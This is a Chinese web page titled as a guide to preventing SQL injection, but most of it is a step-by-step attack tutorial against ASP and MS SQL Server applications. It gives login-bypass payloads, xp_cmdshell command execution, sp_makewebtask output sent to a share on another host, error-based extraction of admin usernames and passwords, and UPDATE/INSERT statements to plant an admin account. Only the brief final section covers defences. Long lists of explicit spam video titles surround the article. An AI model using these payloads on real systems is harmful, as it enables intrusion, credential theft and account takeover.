中文字幕免费精品_亚洲视频自拍_亚洲综合国产激情另类一区_色综合咪咪久久

怎樣預(yù)防SQL注入
來源:易賢網(wǎng) 閱讀:1387 次 日期:2014-09-28 10:06:42
溫馨提示:易賢網(wǎng)小編為您整理了“怎樣預(yù)防SQL注入”,方便廣大網(wǎng)友查閱!

這篇文章目的是讓初學(xué)者利用SQL注入技術(shù)來解決他們面臨的問題, 成功的使用它們,并在這種攻擊中保護自己.

1.0 介紹

當(dāng)一臺機器只打開了80端口, 你最依賴的漏洞掃描器也不能返回任何有用的內(nèi)容, 并且你知道管理員經(jīng)常為機器打補丁, 我們就不得不使用web攻擊方式了. SQL注入是web攻擊的一種類型 ,這種方式只需要開放80端口就夠了并且即使管理員打了全部的補丁也能工作. 它攻擊的目標(biāo)是web程序(像ASP,JSP,PHP,CGI等)本身而不是web服務(wù)器或系統(tǒng)上運行的服務(wù).

本文不介紹任何新的東西, SQL注入已經(jīng)被廣泛的討論和使用. 我們寫這篇文章目的是因為我們想要使用SQL注入進行一些演練測試,希望這個能對各位有用. 你可以在這里找到一兩個竅門但是請你關(guān)注下”9.0 哪里有更多的信息?” 可以得到關(guān)于SQL注入更多,更深入的技術(shù).

1.1 什么是SQL注入?

通過網(wǎng)頁的輸入項來注入SQL查詢或命令是一種技巧。許多網(wǎng)頁會從用戶那里獲取參數(shù),并構(gòu)建SQL查詢來訪問數(shù)據(jù)庫。以用戶登錄為例,頁面收集用戶名和密碼然后構(gòu)建SQL去查詢數(shù)據(jù)庫,來校驗用戶名和密碼的有效性。通過SQL注入,我們可以發(fā)送經(jīng)過精心編造的用戶名和/或密碼字段,來改變SQL查詢語句并賦予 我們其它一些權(quán)限。

1.2 你需要什么?

任意web瀏覽器。

2.0 你應(yīng)該尋找什么?

嘗試尋找那些允許你提交數(shù)據(jù)的頁面,即: 登錄頁面,查詢頁面,反饋信息等等。有時,HTML頁面會用POST命令來把參數(shù)發(fā)送到另外一個ASP頁面上去。那么,你可能在URL中看不到參數(shù)。不過,你可以查看頁面的HTML源代碼,查找”FORM”標(biāo)簽。你會在一些HTML源代碼中看到類似下面的東東:

1

<FORM action=Search/search.asp method=post>

2

<input type=hidden name=A value=C>

3

</FORM>

位于<FORM>和</FORM>之間的所有內(nèi)容都可能暗含著有用的參數(shù)(利用你的智慧)。

2.1 如果你找不到任何帶有輸入框的頁面怎么辦?

你應(yīng)該尋找諸如ASP, JSP, CGI, 或 PHP這樣的頁面。尤其要找那些攜帶有參數(shù)的 URL,比如:

3.0 如何測試它是否是易受攻擊的?

從一個單引號技巧開始。輸入類似這樣的內(nèi)容:

hi’ or 1=1–

到登錄頁面中,或者密碼中,甚至直接在URL中。例如:

- Login: hi’ or 1=1–

- Pass: hi’ or 1=1–

- http://duck/index.asp?id=hi’ or 1=1–

假如你必須在一個hidden字段中來這樣做,就把HTML源代碼下載下來,保存到硬盤上,修改URL和相應(yīng)的 hidden字段。例如:

1

<FORM action=http://duck/Search/search.asp method=post>

2

<input type=hidden name=A value="hi' or 1=1--">

3

</FORM>

如果夠幸運,不需要任何用戶名和密碼你就可以登錄。

3.1 為什么是 ‘ or 1=1–?

讓我們通過另外一個例子來展示’ or 1=1– 的重要性。除了能繞過“登錄”驗證,它還能展示一些在正常情況下很難看到的額外信息。假設(shè),有一個ASP頁面,其功能是將我們導(dǎo)航到下面的URL:

在URL中,’category’是變量名;food是賦給變量的值。為了完成導(dǎo)航功能,我們猜想ASP頁面應(yīng)該包含下面的代碼(這些代碼是我們?yōu)榱送瓿纱藴y試而編寫的真實代碼):

1

v_cat = request("category")

2

sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"

3

set rs=conn.execute(sqlstr)

如上所示,變量v_cat獲取了參數(shù)category的值,SQL語句將變成:

1

SELECT * FROM product WHERE PCategory='food'

該SQL語句將返回符合where條件的的結(jié)果集。在本例中,where條件是PCategory=’food’ 。

下面,假設(shè)我們將URL改成下面的形式:

or 1=1–

現(xiàn)在,變量v_cat等于”food’ or 1=1– “。將變量v_cat在SQL中進行替換,我們將得到下面語句:

1

SELECT * FROM product WHERE PCategory='food' or 1=1--'

該語句將得到product表中所有記錄,無論PCategory是否等于’food’。“–”告訴MS SQL server忽略其后面的所有內(nèi)容(筆者注:其實可以理解為注釋,“–”后面所有的內(nèi)容都為注釋),方便我們處理單引號。在某些情況下,”–”可以被替換成”#“。

如果后臺的數(shù)據(jù)庫不是SQL Server,查詢語句的單引號就不能被忽略。在這種情況下,我們可以嘗試下面的查詢條件:

‘ or ‘a(chǎn)’='a

此時,SQL語句將變成:

1

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

根據(jù)真實的SQL語句,我們還可以嘗試以下各種變形:

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or ‘a(chǎn)’='a

” or “a”=”a

‘) or (‘a(chǎn)’='a

4.0 我如何通過SQL注入來進行遠程執(zhí)行?

能夠注入SQL命名通常意味著我們可以隨意執(zhí)行任何SQL查詢。默認安裝的MS SQL 服務(wù)是作為SYSTEM來運行的, 它相當(dāng)于 Windows系統(tǒng)中的Administrator。我們可以利用存儲過程,比如master..xp_cmdshell 來進行遠程執(zhí)行:

‘; exec master..xp_cmdshell ‘ping 10.10.1.2′–

如果單引號(‘)不管用,可以試試雙引號 (“)。

分號會終止當(dāng)前的SQL查詢,這就允許你開始一個新的SQL命名。要驗證命令是否執(zhí)行成功,你需要監(jiān)聽來自10.10.1.2的ICMP數(shù)據(jù)包,檢查是否收到來自服務(wù)器的數(shù)據(jù)包:

#tcpdump icmp

如果你沒有收到任何來自服務(wù)器的ping請求,并且收到了暗示許可錯誤的信息,則有可能是管理員限制了Web用戶對存儲過程的訪問。

5.0 如何獲取SQL查詢的輸出?

可以通過使用sp_makewebtask把你的查詢寫入到HTML:

‘; EXEC master..sp_makewebtask “\\10.10.1.3\share\output.html”, “SELECT * FROM INFORMATION_SCHEMA.TABLES”

注意這個目標(biāo)IP的文件夾”share”的共享權(quán)限是Everyone.

6.0 如何從數(shù)據(jù)庫的ODBC錯誤消息中獲取數(shù)據(jù)?

我們幾乎可以在MS SQL服務(wù)器產(chǎn)生的錯誤消息中得到任何我們想要的數(shù)據(jù). 通過類似下面的這個地址:

我們將試圖把這個整數(shù)’10′和另外的字符串進行UNION聯(lián)合操作:

UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

系統(tǒng)表 INFORMATION_SCHEMA.TABLES 包含了服務(wù)器上所有表的信息. 這個TABLE_NAME 字段包含數(shù)據(jù)庫中每個表的字段. 這樣就不存在無此表無此字段的問題了. 看我們的查詢語句:

1

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

這個語句將會返回數(shù)據(jù)庫中第一個表的名字. 當(dāng)我們使用這個字符串值和一個數(shù)字’10′進行UNION操作, MS SQL 服務(wù)器將會試圖轉(zhuǎn)換這個字符串(nvarchar)為一個數(shù)字. 這會產(chǎn)生一個錯誤, 因為我們不能把nvarchar類型轉(zhuǎn)換成數(shù)字. 服務(wù)器將會產(chǎn)生以下錯誤信息:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1′ to a column of data type int.

/index.asp, line 5

這個錯誤消息清楚的告訴我們這個值不能轉(zhuǎn)換為數(shù)字. 同時呢,里面也包含了數(shù)據(jù)庫中第一個表的名字 ,就是”table1″.

想獲取下一個表的名字,我們使用下面的語句:

UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (‘table1′)–

我們也可以使用LIKE關(guān)鍵詞來搜索數(shù)據(jù):

UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%25login%25′–

輸出:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘a(chǎn)dmin_login’ to a column of data type int.

/index.asp, line 5

這個匹配, ‘%25login%25′ 的結(jié)果和 %login% 是一樣的在SQL Server服務(wù)器中.這樣,我們將得到 匹配的第一個表的名字, “admin_login”.

6.1 如何挖掘到表所有列的名稱?

我們可以使用另一個非常有用的表INFORMATION_SCHEMA.COLUMNS 來標(biāo)出某一個的表所有列名:

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’–

輸出:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_id’ to a column of data type int.

/index.asp, line 5

注意錯誤提示,里面已經(jīng)包含了第一個列名, 下面我們使用NOT IN ()來取得下一個列的名稱:

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’)–

輸出:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_name’ to a column of data type int.

/index.asp, line 5

按上面的步驟繼續(xù)下一個,我們就能獲得剩下的所有列的名稱, 即”password”, “details”等列. 當(dāng)我們得到下面的這個錯誤提示時,就表示我們已經(jīng)找出所有的列名了.

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’,'login_name’,'password’,details’)–

輸出:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.

/index.asp, line 5

6.2 如何檢索到我們想要的數(shù)據(jù)?

現(xiàn)在我們已經(jīng)確認了一些重要的表,以及它們的列名,我們可以用同樣的技巧從數(shù)據(jù)庫中挖掘任何我們想要的信息.

現(xiàn)在,讓我們從這個”admin_login”表中得到第一個login_name的值吧:

UNION SELECT TOP 1 login_name FROM admin_login–

輸出:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘neo’ to a column of data type int.

/index.asp, line 5

根據(jù)上面的錯誤提示我們知道這里有一個管理員的登錄名是”neo”.下面,我們從數(shù)據(jù)庫中到”neo”的密碼:

UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘m4trix’ to a column of data type int.

/index.asp, line 5

密碼就在錯誤提示里了,現(xiàn)在讓我們用”neo”和密碼”m4trix”登錄試試吧.

6.3 如何獲取數(shù)字型字符串的值?

上面所述的技術(shù)具有局限性。在我們試圖轉(zhuǎn)換包含有效數(shù)字(即只是0-9之間的字符)的時候,我們沒有得到任何錯誤信息。讓我們試著獲取”trinity”的密碼”31173″:

UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’

我們可能得到”此頁面不存在“的錯誤。原因在于:在于整數(shù)(這時是10)聯(lián)接之前,密碼”31173″將轉(zhuǎn)換為一個數(shù)字。由于這是一個有效地聯(lián)接(UNION)語句,因此SQL Server不會拋出ODBC錯誤信息,因此我們將不能獲取到任何數(shù)字型的項。

為了解決這個問題,我們給數(shù)字型字符串后面提交一些字母,這樣可以確保轉(zhuǎn)換失效。讓我們看看下面這個查詢:

UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’

我們只是給我們需要的密碼文本后添加了加號(+)。(“+”的ASCII編碼是0x2b)。我們將給真正的密碼后添加“(空格)休眠符“。因此,即使我們有一個字符型字符串”31173“,它最終將變?yōu)椤?1173休眠符“。通過手工調(diào)用convert()函數(shù)試圖把“31173休眠符“轉(zhuǎn)換為整數(shù)時,SQL Server拋出ODBC錯誤信息:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’31173 morpheus’ to a column of data type int.

/index.asp, line 5

現(xiàn)在,你就可以使用密碼為”31173″的”trinity”用戶登陸了。

7.0 如何向數(shù)據(jù)庫中更新或插入數(shù)據(jù)?

當(dāng)我們成功的獲取到一張表的所有字段名后,我們就有可能UPDATE甚至INSERT一條新記錄到該表中。例如,修改”neo”的密碼:

; UPDATE ‘a(chǎn)dmin_login’ SET ‘password’ = ‘newpas5′ WHERE login_name=’neo’–

下面INSERT一條新記錄到數(shù)據(jù)庫中:

; INSERT INTO ‘a(chǎn)dmin_login’ (‘login_id’, ‘login_name’, ‘password’, ‘details’) VALUES (666,’neo2′,’newpas5′,’NA’)–

現(xiàn)在我們可以用用戶名”neo2″和密碼”newpas5″來登錄了。

8.0 如何避免SQL注入?

過濾參數(shù)中的單引號、雙引號、斜杠、反斜杠、分號等字符;以及NULL、回車符、換行符等擴展字符。這些參數(shù)可能來自于:

前臺表單(form)中的用戶輸入

URL中的參數(shù)

cookie

對于數(shù)字,在將其傳入SQL語句之前將其從字符串(String)轉(zhuǎn)換成數(shù)字(Number);或者用ISNUMERIC函數(shù)確定其確實是數(shù)字。

將SQL Server的運行用戶修改為低權(quán)限用戶(low privilege user)。

刪除不再需要的存儲過程,例如:master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

更多信息請查看IT技術(shù)專欄

更多信息請查看數(shù)據(jù)庫
易賢網(wǎng)手機網(wǎng)站地址:怎樣預(yù)防SQL注入
由于各方面情況的不斷調(diào)整與變化,易賢網(wǎng)提供的所有考試信息和咨詢回復(fù)僅供參考,敬請考生以權(quán)威部門公布的正式信息和咨詢?yōu)闇?zhǔn)!

2026上岸·考公考編培訓(xùn)報班

  • 報班類型
  • 姓名
  • 手機號
  • 驗證碼
關(guān)于我們 | 聯(lián)系我們 | 人才招聘 | 網(wǎng)站聲明 | 網(wǎng)站幫助 | 非正式的簡要咨詢 | 簡要咨詢須知 | 新媒體/短視頻平臺 | 手機站點 | 投訴建議
工業(yè)和信息化部備案號:滇ICP備2023014141號-1 云南省教育廳備案號:云教ICP備0901021 滇公網(wǎng)安備53010202001879號 人力資源服務(wù)許可證:(云)人服證字(2023)第0102001523號
云南網(wǎng)警備案專用圖標(biāo)
聯(lián)系電話:0871-65099533/13759567129 獲取招聘考試信息及咨詢關(guān)注公眾號:hfpxwx
咨詢QQ:1093837350(9:00—18:00)版權(quán)所有:易賢網(wǎng)
云南網(wǎng)警報警專用圖標(biāo)
中文字幕免费精品_亚洲视频自拍_亚洲综合国产激情另类一区_色综合咪咪久久
国产日韩欧美三区| 欧美日韩网站| 欧美久久99| 国产欧美日韩91| 久久久夜夜夜| 亚洲国产精品一区二区第一页| 欧美一区二区大片| 在线观看日韩欧美| 欧美日韩精品免费看| 亚洲免费伊人电影在线观看av| 欧美日韩视频一区二区| 亚洲一区免费网站| 韩国成人理伦片免费播放| 欧美激情亚洲一区| 亚洲国产高清aⅴ视频| 老色批av在线精品| 一本在线高清不卡dvd| 国产日韩一区二区| 亚洲欧美综合网| 国产一区二区丝袜高跟鞋图片| 欧美精品亚洲一区二区在线播放| 亚洲天堂av在线免费| 韩国一区电影| 国产三区精品| 国产精品视频| 欧美精品一线| 欧美一级夜夜爽| 99国产精品久久久| 91久久综合| 激情久久综合| 国产精品日本| 欧美视频久久| 欧美xx69| 欧美一区二区三区在线视频 | 欧美激情一区二区三区| 性感少妇一区| 亚洲一区在线观看视频| 亚洲女与黑人做爰| 先锋影音国产精品| 欧美一区二区在线视频| 亚洲一区二区三区四区五区黄| 亚洲精品一区二区三区樱花| 黑人中文字幕一区二区三区| 国产亚洲午夜| 一区二区在线免费观看| 亚洲国内自拍| av不卡在线看| 午夜欧美大尺度福利影院在线看| 妖精视频成人观看www| 亚洲自拍电影| 久久婷婷av| 欧美精品一卡二卡| 欧美日韩在线一区二区| 欧美日韩午夜| 欧美久久久久中文字幕| 欧美日韩三区四区| 国内精品久久久久久| 国产一区二区三区在线观看网站| 国内精品视频久久| 亚洲一区二区av电影| 欧美亚洲在线观看| 欧美精品一卡| 一区二区三区在线视频播放| 日韩视频在线你懂得| 欧美一乱一性一交一视频| 女同一区二区| 一区二区在线视频播放| 一区二区欧美日韩视频| 久久久青草婷婷精品综合日韩 | 国产亚洲成av人片在线观看桃| 黄色亚洲在线| 欧美一级黄色网| 国产精品久久久亚洲一区| 日韩视频永久免费| 亚洲福利视频一区| 欧美一区二区三区在线| 欧美色123| av成人免费| 欧美日韩视频在线一区二区观看视频| 国产性做久久久久久| 校园激情久久| 国产一区 二区 三区一级| 亚洲专区免费| 欧美精品免费在线| 亚洲国产精品日韩| 欧美中文在线观看| 激情av一区| 久久久综合网| 亚洲视频在线视频| 欧美成人一区二免费视频软件| 国产九九精品| 亚洲免费网址| 韩国v欧美v日本v亚洲v| 久久久久se| 99国产精品| 黑人操亚洲美女惩罚| 亚洲美女尤物影院| 欧美国产精品中文字幕| 日韩视频专区| 国产精品igao视频网网址不卡日韩| 99热在这里有精品免费| 国产欧美精品国产国产专区| 老司机免费视频久久| 亚洲深爱激情| 好看的亚洲午夜视频在线| 久久一二三四| 亚洲欧美日韩综合| 亚洲国产成人在线| 国产九区一区在线| 欧美精品激情在线| 久久久久久久999精品视频| 亚洲欧洲午夜| 亚洲二区视频在线| 国产亚洲免费的视频看| 欧美日韩 国产精品| 久久久久国产精品www| 一区二区激情| 日韩天堂在线视频| 在线观看成人一级片| 国产亚洲欧美激情| 麻豆av一区二区三区| 亚洲香蕉网站| 亚洲性夜色噜噜噜7777| 99精品视频免费全部在线| 尤物在线观看一区| 在线观看日韩国产| 久久蜜臀精品av| 亚洲欧美在线另类| 性伦欧美刺激片在线观看| 午夜精品久久久久久久久久久| 一区二区三区黄色| 一区二区免费看| 亚洲欧洲精品一区二区三区 | 亚洲美女毛片| 亚洲精品色图| 亚洲一区二区三区四区在线观看| 亚洲三级免费电影| 亚洲精品一区二区三区樱花| 日韩视频中文| 99国产精品视频免费观看一公开| 91久久精品国产91性色| 欧美午夜视频在线观看| 久久久久青草大香线综合精品| 亚洲欧美日韩区| 亚洲在线1234| 久久激情网站| 欧美日本韩国在线| 美女在线一区二区| 欧美激情一区二区三区在线视频 | 亚洲伦理在线| 亚洲免费一在线| 久久aⅴ乱码一区二区三区| 亚洲午夜激情| 美女主播精品视频一二三四| 欧美三日本三级少妇三2023| 欧美视频不卡| 国内精品久久久久久| 中文精品视频一区二区在线观看| 亚洲图中文字幕| 国产一区二区在线观看免费播放| 91久久国产精品91久久性色| 日韩一级免费观看| 久久精品人人爽| 美女脱光内衣内裤视频久久影院 | 欧美成人午夜77777| 欧美mv日韩mv国产网站| 欧美久久婷婷综合色| 国模精品一区二区三区| 亚洲一区二区三区四区在线观看 | 欧美在线观看网站| 欧美日韩精品免费观看视一区二区| 久久久午夜电影| 国产欧美日韩| 亚洲国产精品精华液网站| 欧美一区午夜精品| 欧美日韩国产麻豆| 在线观看亚洲视频| 久久九九国产精品怡红院| 国产精品日韩在线播放| 亚洲先锋成人| 欧美视频免费在线| 亚洲综合色噜噜狠狠| 国产精品国产三级国产aⅴ无密码| 亚洲人成绝费网站色www| 日韩视频一区二区| 亚洲视频一起| 国产精品毛片在线看| 亚洲激情第一页| 欧美激情亚洲综合一区| 99在线|亚洲一区二区| 欧美三级电影一区| 亚洲免费视频一区二区| 国产日韩视频| 性做久久久久久久免费看| 韩国av一区| 欧美区在线观看| 性欧美暴力猛交另类hd| 国产亚洲精品高潮| 久久亚洲捆绑美女| 一区二区三区视频在线看|